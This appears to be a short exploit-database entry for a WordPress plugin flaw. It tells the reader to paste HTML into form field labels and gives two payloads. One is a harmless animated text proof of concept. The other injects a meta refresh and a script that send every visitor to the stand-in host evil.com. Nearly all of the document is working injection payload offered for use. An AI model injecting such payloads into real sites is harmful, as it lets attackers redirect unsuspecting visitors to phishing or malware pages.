Share
## https://sploitus.com/exploit?id=WPEX-ID:558E06AB-704B-4BB1-BA7F-B5F6BBBD68D9
Put the following code in any form field (for example name, email, message etc) labels:

<!DOCTYPE html> <html> <head> <style> @keyframes moving {     0% { transform: translateX(0); }     50% { transform: translateX(100px); }     100% { transform: translateX(0); } }  .horizontal-text {     display: inline-block;     animation: moving 2s infinite linear; } </style> </head> <body>     <div class="horizontal-text">Sam</div> </body> </html>

or 

<!DOCTYPE html>
<html>
<head>
  <meta charset="UTF-8">
  <meta http-equiv="refresh" content="0; URL=https://evil.com">
</head>
<body>
  <script>
    window.location.href = "https://evil.com";
  </script>
</body>
</html>